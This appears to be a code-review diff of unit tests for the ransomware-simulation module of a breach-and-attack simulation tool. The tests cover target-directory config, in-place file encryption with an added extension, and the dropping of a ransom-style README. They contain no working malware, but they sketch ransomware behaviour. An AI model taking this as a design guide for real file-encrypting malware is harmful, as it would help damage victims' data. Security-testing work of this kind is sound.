|
||||||
|
from infection_monkey.ransomware import ransomware_config
|
||||||
|
from infection_monkey.ransomware.ransomware_config import RansomwareConfig
|
||||||
|
|
||||||
|
LINUX_DIR = "/tmp/test"
|
||||||
|
WINDOWS_DIR = "C:\\tmp\\test"
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture
|
||||||
|
def config_from_island():
|
||||||
|
return {
|
||||||
|
"encryption": {
|
||||||
|
"enabled": None,
|
||||||
|
"directories": {
|
||||||
|
"linux_target_dir": LINUX_DIR,
|
||||||
|
"windows_target_dir": WINDOWS_DIR,
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"other_behaviors": {"readme": None},
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("enabled", [True, False])
|
||||||
|
def test_encryption_enabled(enabled, config_from_island):
|
||||||
|
config_from_island["encryption"]["enabled"] = enabled
|
||||||
|
config = RansomwareConfig(config_from_island)
|
||||||
|
|
||||||
|
assert config.encryption_enabled == enabled
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("enabled", [True, False])
|
||||||
|
def test_readme_enabled(enabled, config_from_island):
|
||||||
|
config_from_island["other_behaviors"]["readme"] = enabled
|
||||||
|
config = RansomwareConfig(config_from_island)
|
||||||
|
|
||||||
|
assert config.readme_enabled == enabled
|
||||||
|
|
||||||
|
|
||||||
|
def test_linux_target_dir(monkeypatch, config_from_island):
|
||||||
|
monkeypatch.setattr(ransomware_config, "is_windows_os", lambda: False)
|
||||||
|
|
||||||
|
config = RansomwareConfig(config_from_island)
|
||||||
|
assert config.target_directory == Path(LINUX_DIR)
|
||||||
|
|
||||||
|
|
||||||
|
def test_windows_target_dir(monkeypatch, config_from_island):
|
||||||
|
monkeypatch.setattr(ransomware_config, "is_windows_os", lambda: True)
|
||||||
|
|
||||||
|
config = RansomwareConfig(config_from_island)
|
||||||
|
assert config.target_directory == Path(WINDOWS_DIR)
|
||||||
|
|
||||||
|
|
||||||
|
def test_env_variables_in_target_dir_resolved(config_from_island, patched_home_env, tmp_path):
|
||||||
|
path_with_env_variable = "$HOME/ransomware_target"
|
||||||
|
|
||||||
|
config_from_island["encryption"]["directories"]["linux_target_dir"] = config_from_island[
|
||||||
|
"encryption"
|
||||||
|
]["directories"]["windows_target_dir"] = path_with_env_variable
|
||||||
|
|
||||||
|
config = RansomwareConfig(config_from_island)
|
||||||
|
assert config.target_directory == patched_home_env / "ransomware_target"
|
||||||
|
|
||||||
|
|
||||||
|
def test_target_dir_is_none(monkeypatch, config_from_island):
|
||||||
|
monkeypatch.setattr(ransomware_config, "expand_path", lambda _: raise_(InvalidPath("invalid")))
|
||||||
|
|
||||||
|
config = RansomwareConfig(config_from_island)
|
||||||
|
assert config.target_directory is None
|
|
@ -1,48 +1,18 @@
|
||||||
import os
|
from pathlib import PurePosixPath
|
||||||
import shutil
|
|
||||||
from pathlib import Path, PurePosixPath
|
|
||||||
from unittest.mock import MagicMock
|
from unittest.mock import MagicMock
|
||||||
|
|
||||||
import pytest
|
import pytest
|
||||||
from tests.unit_tests.infection_monkey.ransomware.ransomware_target_files import (
|
from tests.unit_tests.infection_monkey.ransomware.ransomware_target_files import (
|
||||||
ALL_ZEROS_PDF,
|
ALL_ZEROS_PDF,
|
||||||
ALL_ZEROS_PDF_CLEARTEXT_SHA256,
|
|
||||||
ALL_ZEROS_PDF_ENCRYPTED_SHA256,
|
|
||||||
ALREADY_ENCRYPTED_TXT_M0NK3Y,
|
|
||||||
ALREADY_ENCRYPTED_TXT_M0NK3Y_CLEARTEXT_SHA256,
|
|
||||||
HELLO_TXT,
|
|
||||||
HELLO_TXT_CLEARTEXT_SHA256,
|
|
||||||
SHORTCUT_LNK,
|
|
||||||
SHORTCUT_LNK_CLEARTEXT_SHA256,
|
|
||||||
SUBDIR,
|
|
||||||
TEST_KEYBOARD_TXT,
|
TEST_KEYBOARD_TXT,
|
||||||
TEST_KEYBOARD_TXT_CLEARTEXT_SHA256,
|
|
||||||
TEST_KEYBOARD_TXT_ENCRYPTED_SHA256,
|
|
||||||
TEST_LIB_DLL,
|
|
||||||
TEST_LIB_DLL_CLEARTEXT_SHA256,
|
|
||||||
)
|
)
|
||||||
from tests.utils import hash_file, is_user_admin
|
|
||||||
|
|
||||||
from infection_monkey.ransomware import ransomware_payload as ransomware_payload_module
|
from infection_monkey.ransomware.ransomware_config import RansomwareConfig
|
||||||
from infection_monkey.ransomware.ransomware_payload import EXTENSION, README_DEST, RansomwarePayload
|
from infection_monkey.ransomware.ransomware_payload import (
|
||||||
|
README_DEST,
|
||||||
|
README_SRC,
|
||||||
def with_extension(filename):
|
RansomwarePayload,
|
||||||
return f"{filename}{EXTENSION}"
|
)
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture
|
|
||||||
def ransomware_payload_config(ransomware_target):
|
|
||||||
return {
|
|
||||||
"encryption": {
|
|
||||||
"enabled": True,
|
|
||||||
"directories": {
|
|
||||||
"linux_target_dir": str(ransomware_target),
|
|
||||||
"windows_target_dir": str(ransomware_target),
|
|
||||||
},
|
|
||||||
},
|
|
||||||
"other_behaviors": {"readme": False},
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture
|
@pytest.fixture
|
||||||
|
@ -51,138 +21,91 @@ def ransomware_payload(build_ransomware_payload, ransomware_payload_config):
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture
|
@pytest.fixture
|
||||||
def build_ransomware_payload(telemetry_messenger_spy):
|
def build_ransomware_payload(
|
||||||
|
mock_file_encryptor, mock_file_selector, mock_leave_readme, telemetry_messenger_spy
|
||||||
|
):
|
||||||
def inner(config):
|
def inner(config):
|
||||||
return RansomwarePayload(config, telemetry_messenger_spy, shutil.copyfile)
|
return RansomwarePayload(
|
||||||
|
config,
|
||||||
|
mock_file_encryptor,
|
||||||
|
mock_file_selector,
|
||||||
|
mock_leave_readme,
|
||||||
|
telemetry_messenger_spy,
|
||||||
|
)
|
||||||
|
|
||||||
return inner
|
return inner
|
||||||
|
|
||||||
|
|
||||||
def test_env_variables_in_target_dir_resolved_linux(
|
@pytest.fixture
|
||||||
ransomware_payload_config, build_ransomware_payload, ransomware_target, patched_home_env
|
def ransomware_payload_config(ransomware_test_data):
|
||||||
|
class RansomwareConfigStub(RansomwareConfig):
|
||||||
|
def __init__(self, encryption_enabled, readme_enabled, target_directory):
|
||||||
|
self.encryption_enabled = encryption_enabled
|
||||||
|
self.readme_enabled = readme_enabled
|
||||||
|
self.target_directory = target_directory
|
||||||
|
|
||||||
|
return RansomwareConfigStub(True, False, ransomware_test_data)
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture
|
||||||
|
def mock_file_encryptor():
|
||||||
|
return MagicMock()
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture
|
||||||
|
def mock_file_selector(ransomware_test_data):
|
||||||
|
selected_files = [
|
||||||
|
ransomware_test_data / ALL_ZEROS_PDF,
|
||||||
|
ransomware_test_data / TEST_KEYBOARD_TXT,
|
||||||
|
]
|
||||||
|
return MagicMock(return_value=selected_files)
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture
|
||||||
|
def mock_leave_readme():
|
||||||
|
return MagicMock()
|
||||||
|
|
||||||
|
|
||||||
|
def test_files_selected_from_target_dir(
|
||||||
|
ransomware_payload,
|
||||||
|
ransomware_payload_config,
|
||||||
|
mock_file_selector,
|
||||||
):
|
):
|
||||||
path_with_env_variable = "$HOME/ransomware_target"
|
ransomware_payload.run_payload()
|
||||||
|
mock_file_selector.assert_called_with(ransomware_payload_config.target_directory)
|
||||||
ransomware_payload_config["encryption"]["directories"][
|
|
||||||
"linux_target_dir"
|
|
||||||
] = ransomware_payload_config["encryption"]["directories"][
|
|
||||||
"windows_target_dir"
|
|
||||||
] = path_with_env_variable
|
|
||||||
build_ransomware_payload(ransomware_payload_config).run_payload()
|
|
||||||
|
|
||||||
assert (
|
|
||||||
hash_file(ransomware_target / with_extension(ALL_ZEROS_PDF))
|
|
||||||
== ALL_ZEROS_PDF_ENCRYPTED_SHA256
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def test_file_with_excluded_extension_not_encrypted(ransomware_target, ransomware_payload):
|
def test_all_selected_files_encrypted(
|
||||||
|
ransomware_test_data, ransomware_payload, mock_file_encryptor
|
||||||
|
):
|
||||||
ransomware_payload.run_payload()
|
ransomware_payload.run_payload()
|
||||||
|
|
||||||
assert hash_file(ransomware_target / TEST_LIB_DLL) == TEST_LIB_DLL_CLEARTEXT_SHA256
|
assert mock_file_encryptor.call_count == 2
|
||||||
|
mock_file_encryptor.assert_any_call(ransomware_test_data / ALL_ZEROS_PDF)
|
||||||
|
mock_file_encryptor.assert_any_call(ransomware_test_data / TEST_KEYBOARD_TXT)
|
||||||
def test_shortcut_not_encrypted(ransomware_target, ransomware_payload):
|
|
||||||
ransomware_payload.run_payload()
|
|
||||||
|
|
||||||
assert hash_file(ransomware_target / SHORTCUT_LNK) == SHORTCUT_LNK_CLEARTEXT_SHA256
|
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.skipif(
|
|
||||||
os.name == "nt" and not is_user_admin(), reason="Test requires admin rights on Windows"
|
|
||||||
)
|
|
||||||
def test_symlink_not_encrypted(ransomware_target, ransomware_payload):
|
|
||||||
SYMLINK = "symlink.pdf"
|
|
||||||
link_path = ransomware_target / SYMLINK
|
|
||||||
link_path.symlink_to(ransomware_target / TEST_LIB_DLL)
|
|
||||||
|
|
||||||
ransomware_payload.run_payload()
|
|
||||||
|
|
||||||
assert hash_file(ransomware_target / SYMLINK) == TEST_LIB_DLL_CLEARTEXT_SHA256
|
|
||||||
|
|
||||||
|
|
||||||
def test_encryption_not_recursive(ransomware_target, ransomware_payload):
|
|
||||||
ransomware_payload.run_payload()
|
|
||||||
|
|
||||||
assert hash_file(ransomware_target / SUBDIR / HELLO_TXT) == HELLO_TXT_CLEARTEXT_SHA256
|
|
||||||
|
|
||||||
|
|
||||||
def test_all_files_with_included_extension_encrypted(ransomware_target, ransomware_payload):
|
|
||||||
assert hash_file(ransomware_target / ALL_ZEROS_PDF) == ALL_ZEROS_PDF_CLEARTEXT_SHA256
|
|
||||||
assert hash_file(ransomware_target / TEST_KEYBOARD_TXT) == TEST_KEYBOARD_TXT_CLEARTEXT_SHA256
|
|
||||||
|
|
||||||
ransomware_payload.run_payload()
|
|
||||||
|
|
||||||
assert (
|
|
||||||
hash_file(ransomware_target / with_extension(ALL_ZEROS_PDF))
|
|
||||||
== ALL_ZEROS_PDF_ENCRYPTED_SHA256
|
|
||||||
)
|
|
||||||
assert (
|
|
||||||
hash_file(ransomware_target / with_extension(TEST_KEYBOARD_TXT))
|
|
||||||
== TEST_KEYBOARD_TXT_ENCRYPTED_SHA256
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def test_file_encrypted_in_place(ransomware_target, ransomware_payload):
|
|
||||||
expected_test_keyboard_inode = os.stat(ransomware_target / TEST_KEYBOARD_TXT).st_ino
|
|
||||||
|
|
||||||
ransomware_payload.run_payload()
|
|
||||||
|
|
||||||
actual_test_keyboard_inode = os.stat(
|
|
||||||
ransomware_target / with_extension(TEST_KEYBOARD_TXT)
|
|
||||||
).st_ino
|
|
||||||
|
|
||||||
assert expected_test_keyboard_inode == actual_test_keyboard_inode
|
|
||||||
|
|
||||||
|
|
||||||
def test_encryption_reversible(ransomware_target, ransomware_payload):
|
|
||||||
orig_path = ransomware_target / TEST_KEYBOARD_TXT
|
|
||||||
new_path = ransomware_target / with_extension(TEST_KEYBOARD_TXT)
|
|
||||||
assert hash_file(orig_path) == TEST_KEYBOARD_TXT_CLEARTEXT_SHA256
|
|
||||||
|
|
||||||
ransomware_payload.run_payload()
|
|
||||||
assert hash_file(new_path) == TEST_KEYBOARD_TXT_ENCRYPTED_SHA256
|
|
||||||
|
|
||||||
new_path.rename(orig_path)
|
|
||||||
ransomware_payload.run_payload()
|
|
||||||
assert (
|
|
||||||
hash_file(ransomware_target / with_extension(TEST_KEYBOARD_TXT))
|
|
||||||
== TEST_KEYBOARD_TXT_CLEARTEXT_SHA256
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def test_skip_already_encrypted_file(ransomware_target, ransomware_payload):
|
|
||||||
ransomware_payload.run_payload()
|
|
||||||
|
|
||||||
assert not (ransomware_target / with_extension(ALREADY_ENCRYPTED_TXT_M0NK3Y)).exists()
|
|
||||||
assert (
|
|
||||||
hash_file(ransomware_target / ALREADY_ENCRYPTED_TXT_M0NK3Y)
|
|
||||||
== ALREADY_ENCRYPTED_TXT_M0NK3Y_CLEARTEXT_SHA256
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def test_encryption_skipped_if_configured_false(
|
def test_encryption_skipped_if_configured_false(
|
||||||
build_ransomware_payload, ransomware_payload_config, ransomware_target
|
build_ransomware_payload, ransomware_payload_config, mock_file_encryptor
|
||||||
):
|
):
|
||||||
ransomware_payload_config["encryption"]["enabled"] = False
|
ransomware_payload_config.encryption_enabled = False
|
||||||
|
|
||||||
ransomware_payload = build_ransomware_payload(ransomware_payload_config)
|
ransomware_payload = build_ransomware_payload(ransomware_payload_config)
|
||||||
ransomware_payload.run_payload()
|
ransomware_payload.run_payload()
|
||||||
|
|
||||||
assert hash_file(ransomware_target / ALL_ZEROS_PDF) == ALL_ZEROS_PDF_CLEARTEXT_SHA256
|
assert mock_file_encryptor.call_count == 0
|
||||||
assert hash_file(ransomware_target / TEST_KEYBOARD_TXT) == TEST_KEYBOARD_TXT_CLEARTEXT_SHA256
|
|
||||||
|
|
||||||
|
|
||||||
def test_encryption_skipped_if_no_directory(
|
def test_encryption_skipped_if_no_directory(
|
||||||
build_ransomware_payload, ransomware_payload_config, telemetry_messenger_spy
|
build_ransomware_payload, ransomware_payload_config, mock_file_encryptor
|
||||||
):
|
):
|
||||||
ransomware_payload_config["encryption"]["enabled"] = True
|
ransomware_payload_config.encryption_enabled = True
|
||||||
ransomware_payload_config["encryption"]["directories"]["linux_target_dir"] = ""
|
ransomware_payload_config.target_directory = None
|
||||||
ransomware_payload_config["encryption"]["directories"]["windows_target_dir"] = ""
|
|
||||||
|
|
||||||
ransomware_payload = build_ransomware_payload(ransomware_payload_config)
|
ransomware_payload = build_ransomware_payload(ransomware_payload_config)
|
||||||
ransomware_payload.run_payload()
|
ransomware_payload.run_payload()
|
||||||
assert len(telemetry_messenger_spy.telemetries) == 0
|
|
||||||
|
assert mock_file_encryptor.call_count == 0
|
||||||
|
|
||||||
|
|
||||||
def test_telemetry_success(ransomware_payload, telemetry_messenger_spy):
|
def test_telemetry_success(ransomware_payload, telemetry_messenger_spy):
|
||||||
|
@ -200,64 +123,55 @@ def test_telemetry_success(ransomware_payload, telemetry_messenger_spy):
|
||||||
assert telem_2.get_data()["files"][0]["error"] == ""
|
assert telem_2.get_data()["files"][0]["error"] == ""
|
||||||
|
|
||||||
|
|
||||||
def test_telemetry_failure(monkeypatch, ransomware_payload, telemetry_messenger_spy):
|
def test_telemetry_failure(
|
||||||
monkeypatch.setattr(
|
monkeypatch, ransomware_payload_config, mock_leave_readme, telemetry_messenger_spy
|
||||||
ransomware_payload_module,
|
|
||||||
"select_production_safe_target_files",
|
|
||||||
lambda a, b: [PurePosixPath("/file/not/exist")],
|
|
||||||
),
|
|
||||||
|
|
||||||
ransomware_payload.run_payload()
|
|
||||||
telem_1 = telemetry_messenger_spy.telemetries[0]
|
|
||||||
|
|
||||||
assert "/file/not/exist" in telem_1.get_data()["files"][0]["path"]
|
|
||||||
assert not telem_1.get_data()["files"][0]["success"]
|
|
||||||
assert "No such file or directory" in telem_1.get_data()["files"][0]["error"]
|
|
||||||
|
|
||||||
|
|
||||||
def test_readme_false(build_ransomware_payload, ransomware_payload_config, ransomware_target):
|
|
||||||
ransomware_payload_config["other_behaviors"]["readme"] = False
|
|
||||||
ransomware_payload = build_ransomware_payload(ransomware_payload_config)
|
|
||||||
|
|
||||||
ransomware_payload.run_payload()
|
|
||||||
assert not Path(ransomware_target / README_DEST).exists()
|
|
||||||
|
|
||||||
|
|
||||||
def test_readme_true(build_ransomware_payload, ransomware_payload_config, ransomware_target):
|
|
||||||
ransomware_payload_config["other_behaviors"]["readme"] = True
|
|
||||||
ransomware_payload = build_ransomware_payload(ransomware_payload_config)
|
|
||||||
|
|
||||||
ransomware_payload.run_payload()
|
|
||||||
assert Path(ransomware_target / README_DEST).exists()
|
|
||||||
|
|
||||||
|
|
||||||
def test_readme_already_exists(
|
|
||||||
monkeypatch, ransomware_payload_config, telemetry_messenger_spy, ransomware_target
|
|
||||||
):
|
):
|
||||||
monkeypatch.setattr(ransomware_payload_module, "TARGETED_FILE_EXTENSIONS", set()),
|
file_not_exists = "/file/not/exist"
|
||||||
mock_copy_file = MagicMock()
|
ransomware_payload = RansomwarePayload(
|
||||||
|
ransomware_payload_config,
|
||||||
|
MagicMock(
|
||||||
|
side_effect=FileNotFoundError(
|
||||||
|
f"[Errno 2] No such file or directory: '{file_not_exists}'"
|
||||||
|
)
|
||||||
|
),
|
||||||
|
MagicMock(return_value=[PurePosixPath(file_not_exists)]),
|
||||||
|
mock_leave_readme,
|
||||||
|
telemetry_messenger_spy,
|
||||||
|
)
|
||||||
|
|
||||||
ransomware_payload_config["other_behaviors"]["readme"] = True
|
ransomware_payload.run_payload()
|
||||||
Path(ransomware_target / README_DEST).touch()
|
telem = telemetry_messenger_spy.telemetries[0]
|
||||||
RansomwarePayload(
|
|
||||||
ransomware_payload_config, telemetry_messenger_spy, mock_copy_file
|
|
||||||
).run_payload()
|
|
||||||
|
|
||||||
mock_copy_file.assert_not_called()
|
assert file_not_exists in telem.get_data()["files"][0]["path"]
|
||||||
|
assert not telem.get_data()["files"][0]["success"]
|
||||||
|
assert "No such file or directory" in telem.get_data()["files"][0]["error"]
|
||||||
|
|
||||||
|
|
||||||
|
def test_readme_false(build_ransomware_payload, ransomware_payload_config, mock_leave_readme):
|
||||||
|
ransomware_payload_config.readme_enabled = False
|
||||||
|
ransomware_payload = build_ransomware_payload(ransomware_payload_config)
|
||||||
|
|
||||||
|
ransomware_payload.run_payload()
|
||||||
|
mock_leave_readme.assert_not_called()
|
||||||
|
|
||||||
|
|
||||||
|
def test_readme_true(
|
||||||
|
build_ransomware_payload, ransomware_payload_config, mock_leave_readme, ransomware_test_data
|
||||||
|
):
|
||||||
|
ransomware_payload_config.readme_enabled = True
|
||||||
|
ransomware_payload = build_ransomware_payload(ransomware_payload_config)
|
||||||
|
|
||||||
|
ransomware_payload.run_payload()
|
||||||
|
mock_leave_readme.assert_called_with(README_SRC, ransomware_test_data / README_DEST)
|
||||||
|
|
||||||
|
|
||||||
def test_no_readme_if_no_directory(
|
def test_no_readme_if_no_directory(
|
||||||
monkeypatch, ransomware_payload_config, telemetry_messenger_spy, ransomware_target
|
build_ransomware_payload, ransomware_payload_config, mock_leave_readme
|
||||||
):
|
):
|
||||||
monkeypatch.setattr(ransomware_payload_module, "TARGETED_FILE_EXTENSIONS", set()),
|
ransomware_payload_config.target_directory = None
|
||||||
mock_copy_file = MagicMock()
|
ransomware_payload_config.readme_enabled = True
|
||||||
|
|
||||||
ransomware_payload_config["encryption"]["directories"]["linux_target_dir"] = ""
|
ransomware_payload = build_ransomware_payload(ransomware_payload_config)
|
||||||
ransomware_payload_config["encryption"]["directories"]["windows_target_dir"] = ""
|
|
||||||
ransomware_payload_config["other_behaviors"]["readme"] = True
|
|
||||||
|
|
||||||
RansomwarePayload(
|
ransomware_payload.run_payload()
|
||||||
ransomware_payload_config, telemetry_messenger_spy, mock_copy_file
|
mock_leave_readme.assert_not_called()
|
||||||
).run_payload()
|
|
||||||
|
|
||||||
mock_copy_file.assert_not_called()
|
|
||||||
|
|
|
@ -0,0 +1,32 @@
|
||||||
|
import pytest
|
||||||
|
from tests.utils import hash_file
|
||||||
|
|
||||||
|
from infection_monkey.ransomware.readme_dropper import leave_readme
|
||||||
|
|
||||||
|
DEST_FILE = "README.TXT"
|
||||||
|
README_HASH = "c98c24b677eff44860afea6f493bbaec5bb1c4cbb209c6fc2bbb47f66ff2ad31"
|
||||||
|
EMPTY_FILE_HASH = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture(scope="module")
|
||||||
|
def src_readme(data_for_tests_dir):
|
||||||
|
return data_for_tests_dir / "test_readme.txt"
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture
|
||||||
|
def dest_readme(tmp_path):
|
||||||
|
return tmp_path / DEST_FILE
|
||||||
|
|
||||||
|
|
||||||
|
def test_readme_already_exists(src_readme, dest_readme):
|
||||||
|
dest_readme.touch()
|
||||||
|
|
||||||
|
leave_readme(src_readme, dest_readme)
|
||||||
|
|
||||||
|
assert hash_file(dest_readme) == EMPTY_FILE_HASH
|
||||||
|
|
||||||
|
|
||||||
|
def test_leave_readme(src_readme, dest_readme):
|
||||||
|
leave_readme(src_readme, dest_readme)
|
||||||
|
|
||||||
|
assert hash_file(dest_readme) == README_HASH
|
Loading…
Reference in New Issue